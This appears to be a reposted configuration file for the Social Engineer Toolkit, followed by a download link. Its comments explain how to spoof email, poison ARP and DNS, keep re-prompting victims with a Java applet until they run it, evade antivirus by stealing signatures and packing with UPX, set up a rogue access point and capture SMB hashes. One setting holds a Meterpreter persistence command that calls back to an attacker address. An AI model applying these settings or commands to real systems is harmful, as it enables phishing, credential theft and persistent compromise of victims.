################################################## ################################################ ################################################## ################################################ ## ## ## The following config file will allow you to customize settings within ## ## the Social Engineer Toolkit. The lines that do not have comment code ## ## ("#") are the fields you want to toy with. They are pretty easy to ## ## understand. ## ## ## ## The Metasploit path is the default path for where Metasploit is located. ## ## Metasploit is required for SET to function properly. ## ## ## ## The ETTERCAP function specifies if you want to use ARP Cache poisoning in ## ## conjunction with the web attacks, note that ARP Cache poisoning is only ## ## for internal subnets only and does not work against people on the internet. ## ## ## ## The SENDMAIL option allows you to spoof source IP addresses utilizing an ## ## application called SendMail. Sendmail is NOT installed by default on BackTrack5. ## ## To spoof email addresses when performing the mass email attacks, you must ## ## install Sendmail manually using: apt-get install sendmail ## ## ## ## Note that ETTERCAP and SENDMAIL flags only accept ON or OFF switches. ## ## ## ## Note that the Metasploit_PATH cannot have a / after the folder name. ## ## ## ## There are additional options, read the comments for additional descriptions. ## ## ## ################################################## ################################################ ################################################## ################################################ # # DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE /pentest/exploits/framework3 METASPLOIT_PATH=/opt/framework3/msf3 # # DEFINE TO USE ETTERCAP OR NOT WHEN USING WEBSITE ATTACK ONLY SET TO ON AND OFF ETTERCAP=OFF # # SPECIFY WHAT INTERFACE YOU WANT ETTERCAP OR DSNIFF TO LISTEN ON, IF NOTHING WILL DEFAULT # EXAMPLE: ETTERCAP_INTERFACE=wlan0 ETTERCAP_DSNIFF_INTERFACE=eth0 # # ETTERCAP HOME DIRECTORY (NEEDED FOR DNS_SPOOF) ETTERCAP_PATH=/usr/share/ettercap # # DEFINE TO USE DSNIFF OR NOT WHEN USING WEBSITE ATTACK ONLY SET TO ON AND OFF # IF DSNIFF IS SET TO ON, ETTERCAP WILL AUTOMATICALLY BE DISABLED. DSNIFF=OFF # # SENDMAIL ON OR OFF FOR SPOOFING EMAIL ADDRESSES SENDMAIL=OFF # # SET TO ON IF YOU WANT TO USE EMAIL IN CONJUNCTION WITH WEB ATTACK WEBATTACK_EMAIL=OFF # # CREATE SELF-SIGNED JAVA APPLETS AND SPOOF PUBLISHER NOTE THIS REQUIRES YOU TO # INSTALL ---> JAVA 6 JDK, BT4 OR UBUNTU USERS: apt-get install openjdk-6-jdk # IF THIS IS NOT INSTALLED IT WILL NOT WORK. CAN ALSO DO apt-get install sun-java6-jdk SELF_SIGNED_APPLET=OFF # # THIS FLAG WILL SET THE JAVA ID FLAG WITHIN THE JAVA APPLET TO SOMETHING DIFFERENT. # THIS COULD BE TO MAKE IT LOOK MORE BELIEVABLE OR FOR BETTER OBFUSCATION JAVA_ID_PARAM=Secure Java Applet # # JAVA APPLET REPEATER OPTION WILL CONTINUE TO PROMPT THE USER WITH THE JAVA APPLET IF # THE USER HITS CANCEL. THIS MEANS IT WILL BE NON STOP UNTIL RUN IS EXECUTED. THIS GIVES # A BETTER SUCCESS RATE FOR THE JAVA APPLET ATTACK JAVA_REPEATER=ON # # JAVA REPEATER TIMING WHICH IS THE DELAY IT TAKES BETWEEN THE USER HITTING CANCEL TO # WHEN THE NEXT JAVA APPLET RUNS. BE CAREFUL SETTING TO LOW AS IT WILL SPAWM THEM OVER # AND OVER EVEN IF THEY HIT RUN. 200 EQUALS 2 SECONDS. JAVA_TIME=200 # AUTO DETECTION OF IP ADDRESS INTERFACE UTILIZING GOOGLE, SET THIS ON IF YOU WANT # SET TO AUTODETECT YOUR INTERFACE AUTO_DETECT=ON # # SPECIFY WHAT PORT TO RUN THE HTTP SERVER OFF OF THAT SERVES THE JAVA APPLET ATTACK # OR METASPLOIT EXPLOIT. DEFAULT IS PORT 80. WEB_PORT=80 # # CUSTOM EXE YOU WANT TO USE FOR METASPLOIT ENCODING, THIS USUALLY HAS BETTER AV # DETECTION. CURRENTLY IT IS SET TO LEGIT.BINARY WHICH IS JUST CALC.EXE. AN EXAMPLE # YOU COULD USE WOULD BE PUTTY.EXE SO THIS FIELD WOULD BE /pathtoexe/putty.exe CUSTOM_EXE=legit.binary # # MAN LEFT IN THE MIDDLE PORT, THIS WILL BE USED FOR THE WEB SERVER BIND PORT MLITM_PORT=80 # # USE APACHE INSTEAD OF STANDARD PYTHON WEB SERVERS, THIS WILL INCREASE SPEED OF # THE ATTACK VECTOR APACHE_SERVER=OFF # # PATH TO THE APACHE WEBROOT APACHE_DIRECTORY=/var/www # # TURN ON SSL CERTIFICATES FOR SET SECURE COMMUNICATIONS THROUGH WEB_ATTACK VECTOR WEBATTACK_SSL=OFF # # PATH TO THE PEM FILE TO UTILIZE CERTIFICATES WITH THE WEB ATTACK VECTOR (REQUIRED) # YOU CAN CREATE YOUR OWN UTILIZING SET, JUST TURN ON SELF_SIGNED_CERT # IF YOUR USING THIS FLAG, ENSURE OPENSSL IS INSTALLED! TO TURN THIS ON TURN SELF_SIGNED_CERT # TO THE ON POSITION. # SELF_SIGNED_CERT=OFF # # BELOW IS THE CLIENT/SERVER (PRIVATE) CERT, THIS MUST BE IN PEM FORMAT IN ORDER TO WORK # SIMPLY PLACE THE PATH YOU WANT FOR EXAMPLE /root/ssl_client/server.pem PEM_CLIENT=/root/newcert.pem PEM_SERVER=/root/newreq.pem # # TWEAK THE WEB JACKING TIME USED FOR THE ****** REPLACE, SOMETIMES IT CAN BE A LITTLE SLOW # AND HARDER TO CONVINCE THE VICTIM. 5000 = 5 seconds WEBJACKING_TIME=2000 # #PORT FOR THE COMMAND CENTER COMMAND_CENTER_PORT=44444 # # COMMAND CENTER INTERFACE TO BIND TO BY DEFAULT IT IS LOCALHOST ONLY. IF YOU WANT TO ENABLE IT # SO YOU CAN HIT THE COMMAND CENTER REMOTELY PUT THE INTERFACE TO 0.0.0.0 TO BIND TO ALL INTERFACES. COMMAND_CENTER_INTERFACE=127.0.0.1 # # HOW MANY TIMES SET SHOULD ENCODE A PAYLOAD IF YOU ARE USING STANDARD METASPLOIT ENCODING OPTIONS ENCOUNT=4 # # WHAT DO YOU WANT TO USE FOR YOUR DEFAULT TERMINAL WITHIN THE COMMAND CENTER. THE DEFAULT IS XTERM # THE OPTIONS YOU HAVE ARE AS FOLLOW - GNOME, KONSOLE, XTERM, SOLO. IF YOU SELECT SOLO IT WILL PLACE # ALL RESULTS IN THE SAME SHELL YOU USED TO OPEN THE SET-WEB INTERFACE. THIS IS USEFUL IF YOUR USING # SOMETHING THAT ONLY HAS ONE CONSOLE, LETS SAY A IPHONE OR IPAD. TERMINAL=SOLO # # IF THIS OPTION IS SET, THE METASPLOIT PAYLOADS WILL AUTOMATICALLY MIGRATE TO # NOTEPAD ONCE THE APPLET IS EXECUTED. THIS IS BENEFICIAL IF THE VICTIM CLOSES # THE BROWSER HOWEVER CAN INTRODUCE BUGGY RESULTS WHEN AUTO MIGRATING. AUTO_MIGRATE=OFF # # DIGITAL SIGNATURE STEALING METHOD MUST HAVE THE PEFILE PYTHON MODULES LOADED # FROM http://code.google.com/p/pefile/. BE SURE TO INSTALL THIS BEFORE TURNING # THIS FLAG ON!!! THIS FLAG GIVES MUCH BETTER AV DETECTION DIGITAL_SIGNATURE_STEAL=ON # # THESE TWO OPTIONS WILL TURN THE UPX PACKER TO ON AND AUTOMATICALLY ATTEMPT # TO PACK THE EXECUTABLE WHICH MAY EVADE ANTI-VIRUS A LITTLE BETTER. UPX_ENCODE=ON UPX_PATH=/usr/bin/upx # # HERE WE CAN RUN MULTIPLE METERPRETER SCRIPTS ONCE A SESSION IS ACTIVE. THIS # MAY BE IMPORTANT IF WE ARE SLEEPING AND NEED TO RUN PERSISTENCE, TRY TO ELEVATE # PERMISSIONS AND OTHER TASKS IN AN AUTOMATED FASHION. FIRST TURN THIS TRIGGER ON # THEN CONFIGURE THE FLAGS. NOTE THAT YOU NEED TO SEPERATE THE COMMANDS BY A ; METERPRETER_MULTI_SCRIPT=OFF # # WHAT COMMANDS DO YOU WANT TO RUN ONCE A METERPRETER SESSION HAS BEEN ESTABLISHED. # BE SURE IF YOU WANT MULTIPLE COMMANDS TO SEPERATE WITH A ;. FOR EXAMPLE YOU COULD DO # run getsystem;run hashdump;run persistence TO RUN THREE DIFFERENT COMMANDS METERPRETER_MULTI_COMMANDS=run persistence -r 192.168.1.5 -p 21 -i 300 -X -A;getsystem # # THIS IS THE PORT THAT IS USED FOR THE ****** INJECTION USING THE METASPLOIT BROWSER ATTACKS # BY DEFAULT THIS PORT IS 8080 HOWEVER EGRESS FILTERING MAY BLOCK THIS. MAY WANT TO ADJUST TO # SOMETHING LIKE 21 OR 53 METASPLOIT_******_PORT=8080 # # THIS FEATURE WILL TURN ON OR OFF THE AUTOMATIC REDIRECTION. BY DEFAULT FOR EXAMPLE IN MULTI-ATTACK # THE SITE WILL REDIRECT ONCE ONE SUCCESSFUL ATTACK IS USED. SOME PEOPLE MAY WANT TO USE JAVA APPLET # AND CREDENTIAL HARVESTER FOR EXAMPLE. AUTO_REDIRECT=ON # # THIS FEATURE WILL AUTO EMBED A IMG SRC TAG TO A UNC PATH OF YOUR ATTACK MACHINE. # USEFUL IF YOU WANT TO INTERCEPT THE HALF LM KEYS WITH RAINBOWTABLES. WHAT WILL HAPPEN # IS AS SOON AS THE VICTIM CLICKS THE WEB-PAGE LINK, A UNC PATH WILL BE INITIATED # AND THE METASPLOIT CAPTURE/SMB MODULE WILL INTERCEPT THE HASH VALUES. UNC_EMBED=OFF # # THIS FEATURE WILL ATTEMPT TO TURN CREATE A ROGUE ACCESS POINT AND REDIRECT VICTIMS BACK TO THE # SET WEB SERVER WHEN ASSOCIATED. AIRBASE-NG and DNSSPOOF. ACCESS_POINT_SSID=linksys AIRBASE_NG_PATH=/usr/local/sbin/airbase-ng DNSSPOOF_PATH=/usr/local/sbin/dnsspoof # # EMAIL PROVIDER LIST SUPPORTS GMAIL, HOTMAIL, AND YAHOO. SIMPLY CHANGE THE IT TO THE PROVIDER YOU WANT TO # USE. EMAIL_PROVIDER=GMAIL # # THIS WILL CONFIGURE THE DEFAULT CHANNEL THAT THE WIRELESS ACCESS POINT ATTACK BROADCASTS ON THROUGH WIFI # COMMUNICATIONS. AP_CHANNEL=9 # # THIS WILL REMOVE THE SET INTERACTIVE SHELL FROM THE MENU SELECTION. THE SET PAYLOADS ARE LARGE IN NATURE # AND THINGS LIKE THE PWNIEXPRESS NEED SMALLER SET BUILDS SET_INTERACTIVE_SHELL=ON # ################################################## ################################################## #########
التحميل
http://www.mediafire.com/?jkos3pqtyneeutm